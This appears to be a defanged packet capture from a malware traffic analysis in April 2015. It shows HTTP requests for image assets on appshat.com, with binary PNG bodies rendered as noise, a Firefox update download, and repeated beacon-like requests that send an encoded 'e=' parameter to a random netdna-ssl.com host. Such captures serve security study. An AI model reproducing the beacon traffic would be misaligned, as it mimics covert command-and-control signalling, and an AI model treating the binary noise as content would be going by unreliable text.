....\...w.....:O.Y..u.q. ..k..\W.... .....>...8.}.x...{..........}.
.>^.p\.#u.:......s../........x...c..[........^.....9^.V.2.9^}.X5.5~
.{.^...x-|><n..gY?.1s..z.....Q..{..s....zo]..?...s.2..:?.9..r|r.
....^8..,37rO... ..1..r..39...^...?.Q.S.I. ....x|>..\s.b=....!.
<<< skipped >>>

GET /thumbnails/icon/images/assets/b/b/bbbde9554589bda63791709a6785e0a3.png HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:41 GMT
Content-Type: image/png
Content-Length: 174229
Last-Modified: Sun, 14 Jul 2013 15:20:23 GMT
Connection: keep-alive
ETag: "51e2c1b7-2a895"
Expires: Sun, 19 Apr 2015 00:06:41 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes
.PNG........IHDR..............x......pHYs................MiCCPPhotosho
p ICC profile..x..SwX...>..e.VB....l.."#[email protected]..
..H....(.gA..Z.U\8.....}z............y.....&...j.9R.<:...OH......H.
. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....
ly|B"......I>..................(G$.@..`U.R,......@"......Y.2G.....v
.X..@`...B,.. 8..C.... L..0...._p..H.......K.3.....w....!..l.Ba.).f.."
...#.H..L.........8?......f.l.....k.o">!.........N..._....p...u.k.[
..V.h..][email protected].<......%b..0..>[email protected].@...
...qanv.R....B1n..#......)..4.\,...X..P"M.y.R.D!......2......w....O.N.
...l.~.....X.v.@~.-......g42y.......@ ...........\...L....D..*.A......
........a.D@.$.<.B........A.T.:.............18....\..p..`........A.
..a!:..b.."......"aH4... ...Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u
@.......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v..
..a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._
.H$....N.!%.2I.IkH.H-.S.>..i.L&..m....... ......O.......:...L..$R..
.J5e?....2B...Q.......:.ZIm.vP/S...4u.%...C..-....igi.h/.t.....E....k.
......w......Hb(.k.{...../.L......T0.2..g...oUX*.*|.....:.V.~...TUsU?.
y..T.U..^V}.FU.P.........U..6..RwR.P.Q_.._...c....F..H.Tc....!..2e.XB.
rV..,k.Mb[...Lv...v/{LSCs.f.f.f..q.......9..J.!...{-.-?-..j.f.~.7.z...
b.r......up.@.,..:m:.u..6.Q....u..>.c.y.........G.m..........704.6.
.l18c...c.k.i........h...h..I.'.&..g.5x.>f.o.b.4.e.k<abi2.......
)..k.f....t...,.......9..k.a........E..J.6.....|...M....V>VyV.V
<<< skipped >>>

GET /thumbnails/icon/images/assets/5/2/52d5414e7372639389ab7e9e4d479aee.png HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:41 GMT
Content-Type: image/png
Content-Length: 349673
Last-Modified: Thu, 13 Jun 2013 17:54:49 GMT
Connection: keep-alive
ETag: "51ba0769-555e9"
Expires: Sun, 19 Apr 2015 00:06:41 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes
.PNG........IHDR..............x....U.IDATx.....l.U...8.D.q.}...g*S...`
%[email protected].?.{..U..r..7.......2A.$:).P..y.}.v.
.....\k.8q.}......9r..n.q.}..k.....V.p.:{...^g.......W......^g......u.
..^g......u.:{........u.:{...^g...u.:{...^g.....8{...^g......u...^g...
...u.:{........u.:{...^g...u.:{...^g.....8{...^g......u...^g......u.:{
........u.:{...^g...u.:{...^g.....8{...^g......u...^g......u.:{.......
.u.:{...^_2........f.L&!..P.ja6..<...Y...!/.P...Z.0..BV...r...z.Ng.
...Q.z.^..5...ah..!...X.a..c ..........F.L..~...0.K#......?...(.......
...".\.?.6....8f.....^....\....A.p.B...</.n9/C....<........_....
.Mg..(...........^.....k......p......8O\......8..,..8.Z..a:..s...spOp&
lt;.>.....?_.u~......v.^y...xNx.F...............{..y...?...I...}_..
X.Z....g2..{.......sq,.r...E..../.Z<.....x...k.s..........p.....^..
.(n....0..?....x....G.................x-..V. 2..Q..........~..'a{{ ...
.Mo....~.GB....V;L.q..;........'.AX.c.5.....O..~......}....>...W?..
7.`.._...~...].x/..W....O..\o....G.....C.........B\ZY<.|......../..
x.[...G.x....~.[.?~...k......|.?.5.'....a|..y..1<...V.k............
...?..x.X.X ..4._..:...A|...k...]..u.:.._"..7.V....;.........o.....c.u
.....wul1x..y......n.......q.s........J..z..k8......<^..v.. ..|$...
..|2..'"...I.@<..<..g...........{...T..7W..[...u...x.w..p.p..xO.
.....c;..U.........`<..{....."^.[..8..r.u..6..r}...'c.,.x8..[..>
..mt."....O...{7o.>...........~6...D..D...q..@-........^g.3.p..~W..
.T......:.x4..W;.....1.."........%.z..A-&..x...\P.G.>..{..X...u
<<< skipped >>>

GET /thumbnails/icon/images/assets/0/6/0692c2494a7331a77c05954f79c5480a.png HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3



.q^7Y[.x17.|3g.y&/....f.r9...........:.Hi..........D...1<O..A.`~Z..
.$x`...Mu6.... .|....2..9K..'....A.i~.nn.gN...I.....A/.,d!y.@. .y..VzF
....M.7n..5...z...y.....,..oh..4(..d6.....7.]>m.aR.zyy9W\q...!?...3
....}......{...u.].RSS.Y.z57.|3....._4..=...W.....l..*d$..K....5.v...D
..O...i0.8?......cxN..N]6...s9]...7`...r$Y.W..;...... .Z...=..!.[...v.
.....*....'......4..v...#....jB.n..b(....,.#..7..`.wH$.a.....G?..5....
.....3...SO.. .......6p....n......Y:..E;..2...3....GJ..!H6.....~......
v........C.o.......S....N.E.F....}.....U..R.i.x..!Lz..<.I%....cn.o.
.d............"DrJie..H.dME]Y.... ....^'...B!~.._..Y.\.c.=..?.A.>.h
.....s..I......-....5kf...x.).......F.T[..W_,i.o!FT...yG.....E.<...
..q=[.8q..v~@;qr....Sn!.... .gh..4..<j4....^..>.H..\..LV0V..p.v.
..#B. ....JX..Wh*k....e.i..O.......s...?.y....i.......G.....E.o.>..
?......[g......w....!B!.^x.\r.....^O..<............k.cY.._.......'.
$.\.S.4*1....t...q [email protected]!....W{&..,b}...=.<./...}>...D.V..,Ma
. ..q..:.w...;..[X...e.]6).........p.....O~...7Oh;..r.....x..^7sY.g.gh
...H.!$f*I.3..........Tb.2.{....Y^...?Se/..#4.)[email protected].....
...n.B.!.=......R$.;.$....1....g...!.....v....:....T.7.K..>t....a^.
7.(  c....z..S..]]]...?.....C.../.............k.F..l&..P...2.....-%,.p
*.y......3.E%.}....Zso..w.._..$&.AY.d. (G..!...>I.[.U.sd..>...0.
.d..m.3...hid.i.....A.R.._...P]VA".....y..e3......!.Rr.UW.LN......../.
.c...K........W.^......_...9p..<F|...X...?Y......0.x....'......Vp..
.....,......{. ....c8..$.d.:;y/;.U.o6...y..e...'......B....Q....@.
<<< skipped >>>

GET /thumbnails/icon/images/assets/7/c/7c9d412c730603d1d82b98a548a71bac.png HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:41 GMT
Content-Type: image/png
Content-Length: 124611
Last-Modified: Thu, 13 Jun 2013 17:45:46 GMT
Connection: keep-alive
ETag: "51ba054a-1e6c3"
Expires: Sun, 19 Apr 2015 00:06:41 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes
.PNG........IHDR..............x......tEXtSoftware.Adobe ImageReadyq.e&
lt;...fiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap
/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
 xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xm
p.did:4F00C5A3332268119508BA30823818B3" xmpMM:DocumentID="xmp.did:1274
AE2EF04511DFA81FE5364B1135AE" xmpMM:InstanceID="xmp.iid:1274AE2DF04511
DFA81FE5364B1135AE" xmp:CreatorTool="Adobe Photoshop CS5 Macintosh">
; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:09801174072068118DBB
CF4BA33A4CD7" stRef:documentID="xmp.did:4F00C5A3332268119508BA30823818
B3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> 
<?xpacket end="r"?>#..)....IDATx..}...E.........!. H.........T&l
t;...T..~.....P.....Q...B./...r.%[email protected].]].
]....3.9PQQQQQQY.$.)[email protected].@EEEE
EEE.........5.TTTTTTT..PQQQQQQQ.@EEEEEEE.........5.TTTTTTT..PQQQQQQQ.@
EEEEEEE.........5.TTTTTTT..PQQQQQQQ.@EEEEEE.........5.TTTTTTT..PQQQQQQ
[email protected][email protected]
[email protected][email protected]..
[email protected].@EEEEEEE..........[.
<<< skipped >>>

GET /thumbnails/icon/images/assets/a/c/ac5196fbf245580eee113296dff14d0b.png HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:41 GMT
Content-Type: image/png
Content-Length: 154830
Last-Modified: Thu, 13 Jun 2013 17:45:49 GMT
Connection: keep-alive
ETag: "51ba054d-25cce"
Expires: Sun, 19 Apr 2015 00:06:41 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes
.PNG........IHDR.....................pHYs................ cHRM..m...s.
...u......z....g..0[....P.W...\TIDATx...o.^Ev....R.....h...h4......a0.
....L..,K0...L.!.....b..!....B.K0fYB0&,a.a.a....h.Y ..v..h5.Y#...hZ.U.
..m..{..9u.G....y...~.{...S.|......B..)R.H."E..)R.H."E.....(R.H."E..)R
.H."E..P.H."E..)R.H."E..).@."E..)R.H."E..)R...E..)R.H."E..)R.H....)R.H
."E..)R.H."E..P.H."E..)R.H."E..).@."E..)R.H."E..)R...E..)R.H."E..)R.H.
...)R.H."E..)R.H."..(R.H."E..)R.H."E....H."E..)R.H."E..)R.."E..)R.H."E
..)R.H....)R.H."E..)R.H."..(R.H."E..)R.H."E....H."E..)R.H."E..)R.."E..
)R.H."E..)R.H....)R.H."E..)R.H....)R.H."E..)R.H."E..P.H."E..)R.H."E..)
.@."E..)R.H."E..)R...E..)R.H."E..)R.H....)R.H."E..)R.H."E..P.H."E..)R.
H."E..).@."E..)R.H."E..)R...E..)R.H."E..)R.H....)R.H."E..)R.H."..(R.H.
"E..)R.H."E....H."E..)R.H."E..)R.."E..)R.H."E..)R.H....)R.H."E..)R.H."
..(R.H."E..)R.H."E....H."E..)R.H."E..)R.."E..)R.H."E..)R.H....)R.H."E.
.)R.H....)R.H."E..)R.H."E..P.H."E..)R.H."E..).@."E..)R.H."E..)R...E..)
R.H."E..)R.H....)R.H."E..)R.H."E..P.H."E..)R.H."E..).@."E..)R.H."E..)R
...E..)R.H."E..)R.H....)R.H."E..)R.H."..(R.H."E..)R.H."E....H."E..)R.H
."E..)R.."E..)R.H."E..)R.H....)R.H."E..)R.H."..(R.H."E..)R.H."E....H."
E..)R.H."E..)R.."E..)R.H."E..)R...E..)R.H."E..)R.H..w.*]..%.N...|...,.
4\].U...uMu=..^R.....7V?WWn...T.......zju=...W{..a..`.H."E..)R..K|....
:Y].U...u..n...t/..............|[email protected]..
^\]WU........Y.\)....:Q] ..S9....uau.S].W....._.|m...............e..)R
.H."E.|_.T..........[...l..=..WV.3.keO..H....... .8.....Wx.....Z..
<<< skipped >>>

GET /thumbnails/icon/images/assets/f/3/f3ad8b396434c21b4c214fd667ee391d.png HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:41 GMT
Content-Type: image/png
Content-Length: 33167
Last-Modified: Thu, 13 Jun 2013 17:46:19 GMT
Connection: keep-alive
ETag: "51ba056b-818f"
Expires: Sun, 19 Apr 2015 00:06:41 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes
.PNG........IHDR..............x......sBIT....|.d.....pHYs...........~.
....tEXtSoftware.Adobe Fireworks CS5q..6....tEXtCreation Time.6/28/10.
.]... .IDATx...y.\U....}...-{.CHX.A.d.0 .........A....J...,......D`. .
..(.QF. ..I..d1i $$.CHB*......]..?..S]...s.s.s..........y....9.=....b.
X,.ctt..}>W....X,...b.D......~.@,...b.x...X,...R....b.X,...&....b..
 6..X,........b.X,5.M.,...b.Al.`.X,.K.b....b.Xj...X,...R....b.X,...&..
..b.. 6..X,........b.X,5.M.,...b.Al.`.X,.K.b....b.Xj...X,...R....b.X,.
.$......_._...b.X,..0.........A....~......;.b.X,.Z''.#y?.....c.Q....?.
 ...~?..;.C}....>ugI..UC.G.z .I....T.qj..8.;T.........T:.$...U.pT..
3..._.F.HP....?. Ji|.....8'v....cE.....E.FNQ]_..kB.E}..|..t. .? ......
..5.....!.)......?.....[....-..........BUR..'w...R.E..........!.......
cdl.N>t..q.....,..1........_..C.$.9{p.;....b1.R....."....dE_.O..?PY
...;.Ax..qX.. ~sO..@.@<.....8<.):..9$.....9&0......iB.......~.1P
.P..q.....G..E.%...J.r.Q.t.......KBP.....t..l9.....p.....X.wc...C.cZ..
.W.IP1..........ywS...vez.^L.j..=..~e...}..t.DX......(..P>.1-......
.....b,....wW1...X7P..Eb...Yt..J..v.....dmT..W..A.9.1.......w.U......(
..$ ....n..M!...>...cbx..,.}....f..>`.....q..-..W.XV..`nA`YT....
o..N...S...]....p.A..Ai.....8Y..z.N}q.~.8.....[..5....!T......D.....b.
...}..(..N..t..R.E....S.........._....P>....Blr..h"....T.{UI.S_...)
...L.....(..... .S...C...SqW.....E.98.....a.....f.. P-..>..r.~...N.
Y........Z...$.px.H.nls..(...w.....{/..o....6G....X.W.....|Nh_..rH^U..
..H....G...Z.C[...#IPe.....G$.n....Al.....I.s.[[email protected]\.......!
<<< skipped >>>

GET /thumbnails/icon/images/assets/4/4/442a5f30204dd385d17de5848683274f.png HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3



~q6~?pN..O.<.0a......]..~.s....5.X....U...u^[email protected].....
i.7]{....zh.`m....D..~~Y...K..t...1..........E........VM......'.1..yX.
.k.M#...3.........h.#3.......u.w......2.X.k.....&....tj=...G....*.i...
..]..y.eml...>..$.c....&....k....................?.Q......8g.G.X...
..#.TH..19.^?..h.p..{....S...~..3...X... ......Y7....c-P..oz...$U..M..
...<.>9.0vJ.W.....%..C....]..~b.. .....l=.w...uE..8...'.2.K.x|`Z
.. v....T9.#.|.j..3n..XOk.=..j*[y...'.....F7...lX.%s....J...IO.]#..xa.
.r)8?!ae....e..x....m....O...|h..1.f.:h.....<...2.]w.~...o.A:vD...I
...G.............T..V.HYO...~...8....Z..5.B0...b...s,........x....b...
S..h....,.|./\k1.T.......g$..VZ.P....y0.Yz....L.M......=.......>...
..2..j.)Qv....V..VJ..P.r..........V~s6.T..&m..M...q4.6......A.'...T.Rj
.K....-~"........ .....$.l..........<.'K.1=.....K.<s...4....u^1.
.%..Y.p.q.wzN..`.7:..g.6yV.....$M.[[email protected].`!t.t..]..V.n..6..
.)...iL..y...*:9..R...._._c.V....:..*....&..4...D?..6v...b.KT.sR6.P..E
..R....e.........^..W...N?.<.b.W=.0o..h..............:N?.CM?..T/.{.
.._.;.T...B*2.Y...xqZ.X..9.n...8........I../ ...k..%0.n..Wdo.z..fe.x5.
.z."..4ec.!......V....8.....B.._^.....3;...._..#-........B......h._.M.
.....X.....S. :o....)....y\|......^..i.A.O.i..|q.f}q.4. . =.?<|.C..
x..|... [email protected].=I..|....:......T5.v.........H.D.6....%...&l
t;N\....<MT7..<..@;....S...o_9......T....O...7.....>......O..
.vQ......p..S$..e. ...|...x...2.t#...'.O...k....%l..Xr.....y....O&....
..%8Z).C...<q0....a,....d...z..pXbJL.L..=%.Tp..D........_T.X...
<<< skipped >>>

GET /thumbnails/icon/images/assets/7/e/7e5817bad781bbc2d2e43b350ccb53db.png HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3

GET /thumbnails/icon/images/assets/a/c/ace33f0a1eddf74bbe8d1bfac70deded.png HTTP/1.1
Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3



eX....3...>.T..VL.....G.n....#...A.Q.$./l..........c.x....{Ze...*h.
-...xd....i.....[..\!0..xMOw......s..D...^y."....O..O<...<.=.q..
.....{?..h;.Y...]W...D.....S.......2....C..........U>.....c7.......
...k.......C~.C`..T...2..J.7I.s.o.(......xk.".\C......G..H...s..q.j.&g
t;(.....f.z.[.".R....U.S)....IL..nTV.~?.(E.PdV.t..v...L.&...r'.$.:p#$.
......F.._..`}....([email protected].*..1~..]..(..I..u .e.....0..H>.....
.-.......V.C.K..S....XS..?..?........>a...V%....'....=..a=..q.....]
y.o...'........QY.,...:..`...E..: &Z...../~..\.2..^>p&......W>..
...}...A.t:,......].s..*..........h....*E.H..[.^..)..S"@..."w26.a..W$V
.d....]2.fG....rg....m.e.....D..9`t..}...i....?...7.Z....5.2v.h`p..
...3.-.f....!..6.....S.Z...K.{S.m\.....o'gLK)i....Xi.|H.y..Lr..GM...m.
.t....C.......{.N....$0.....c.....33s0b.iN.?g......Y....8...9...(.S...
.P.kn..F..MMMB.....^:.xy....E..^.E...4C..y..........Z..c.?.......w....
.....7....NX..Lrf......b.?W...._.$tlXS....Q.....$..8..........4....=o.
A...?...`..2..5.<.(....U.m....g............G.k.X.y...}.Q..w.. .....
b.)..a#.....brF..."g..Y.....2.. .`m..1.e.....Q...u..G..@../u.:J').7]..
.u...[RZn...<.A.S.\.....^..<|T....5.18....0.O.u..9...1ojP9......
...ty.....{w....-8.q.z..y..f.... ....e.3...Garb.f.f........]...]_..P..
.zfk....|..Kv.U.T...9]Q.M..j<.T.o?91..=v.n}....>..."..B.H...:\i.
............:r][email protected].''f.k"P.....s....9.....NR.'.#.P"...'H..] &.U. a...
.,.12 d.IP.E..._..%.?.d....."...#N@.|.L`....r..y..$......w...-..o...u.
12._n..,[email protected]..|...D......1.]..c6..GD.........:;c.... .s.r..Z..k
<<< skipped >>>

GET /images/bg_main.jpg HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3

GET /images/btn_bg.jpg HTTP/1.1
Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3

GET /images/close.png HTTP/1.1
Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3; _ga=GA1.2.1223026756.1429400200; _gat=1


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:41 GMT
Content-Type: image/png
Content-Length: 1200
Last-Modified: Wed, 21 Aug 2013 16:47:03 GMT
Connection: keep-alive
ETag: "5214ef07-4b0"
Expires: Sun, 19 Apr 2015 00:06:41 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes
.PNG........IHDR...............1R....tEXtSoftware.Adobe ImageReadyq.e&
lt;..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:75A8A812CEB911E2AE0AE7EB
A740C145" xmpMM:DocumentID="xmp.did:75A8A813CEB911E2AE0AE7EBA740C145"&
gt; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:75A8A810CEB911E2AE
0AE7EBA740C145" stRef:documentID="xmp.did:75A8A811CEB911E2AE0AE7EBA740
C145"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
; <?xpacket end="r"?>he.....$IDATx.b455...`..|...EKK......%%%...
[email protected]..(.........Yrrr999.......r......f..q..U....
...~.....&..7o.........ijjN.4....X.srr..................WTT.:u..3gp...
......?xBA\\.........x.... 55u...@vLL..'O.\.@N<........c.g..r......
.1p..].......!By.PRR".G..*U.=..#[email protected]`.
..
<<< skipped >>>


GET /t.ashx?e=lOCrbsNL2zWQ5lb rGZVAri3muUffR3jI0kPktKhKyd4E7mrr1h80riKIFo3W8f23Wq7IsWCDz75CWDwEisd59aoPZj94HyTXeFaoUgIZNgjlVbxwk2 SY4G r 3F6T7Ye9UEEkdnkbYz9UHnTAf3Mvwero5ya7SNHyd9Jj1gdzCfQagY8pW Q== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: xqjdaibxl-g48pastf.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:15 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13
Connection: keep-alive
Cache-Control: private,no-cache, no-store
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
abfgshdgfjhsk....


GET /t.ashx?e=lOCrbsNL2zWQ5lb rGZVAri3muUffR3jI0kPktKhKyd4E7mrr1h80riKIFo3W8f23Wq7IsWCDz75CWDwEisd59aoPZj94HyTXeFaoUgIZNgjlVbxwk2 SY4G r 3F6T7Ye9UEEkdnkbYz9UHnTAf3Mvwero5ya7SNHyd9Jj1gdzCfQagY8pW Q== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: xqjdaibxl-g48pastf.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:16 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13
Connection: keep-alive
Cache-Control: private,no-cache, no-store
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
abfgshdgfjhsk....


GET /t.ashx?e=lOCrbsNL2zWQ5lb rGZVAri3muUffR3jI0kPktKhKyd4E7mrr1h80riKIFo3W8f23Wq7IsWCDz75CWDwEisd59aoPZj94HyTXeFaoUgIZNgjlVbxwk2 SY4G r 3F6T7Ye9UEEkdnkbYz9UHnTAf3Mvwero5ya7SNHyd9Jj1gdzCfQagY8pW Q== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: xqjdaibxl-g48pastf.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:16 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13
Connection: keep-alive
Cache-Control: private,no-cache, no-store
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
abfgshdgfjhskHTTP/1.1 200 OK..Date: Sat, 18 Apr 2015 23:35:16 GMT..Con
tent-Type: text/html; charset=utf-8..Content-Length: 13..Connection: k
eep-alive..Cache-Control: private,no-cache, no-store..X-AspNet-Version
: 2.0.50727..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X-Cache:
 MISS..abfgshdgfjhsk..



GET /?product=firefox-34.0.5-complete&os=win&lang=en-US HTTP/1.1
Host: download.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Range: bytes=1200000-1499999
Cookie: optimizelySegments={"245617832":"none","245875585":"direct","245677587":"ff","246048108":"false","869421433":"true"}; optimizelyEndUserId=oeu1401956287616r0.2603029596469415; optimizelyBuckets={}; __utma=150903082.1617578787.1401956289.1401956289.1401956289.1
Connection: keep-alive


HTTP/1.1 302 Found
Server: Apache
X-Backend-Server: bouncer1.webapp.scl3.mozilla.com
Cache-Control: max-age=60
Content-Type: text/html; charset=UTF-8
Date: Sat, 18 Apr 2015 23:35:42 GMT
Location: hXXp://download.cdn.mozilla.net/pub/firefox/releases/34.0.5/update/win32/en-US/firefox-34.0.5.complete.mar
Keep-Alive: timeout=3, max=500
Content-Length: 0
Connection: Keep-Alive
X-Cache-Info: cached
HTTP/1.1 302 Found..Server: Apache..X-Backend-Server: bouncer1.webapp.
scl3.mozilla.com..Cache-Control: max-age=60..Content-Type: text/html; 
charset=UTF-8..Date: Sat, 18 Apr 2015 23:35:42 GMT..Location: hXXp://d
ownload.cdn.mozilla.net/pub/firefox/releases/34.0.5/update/win32/en-US
/firefox-34.0.5.complete.mar..Keep-Alive: timeout=3, max=500..Content-
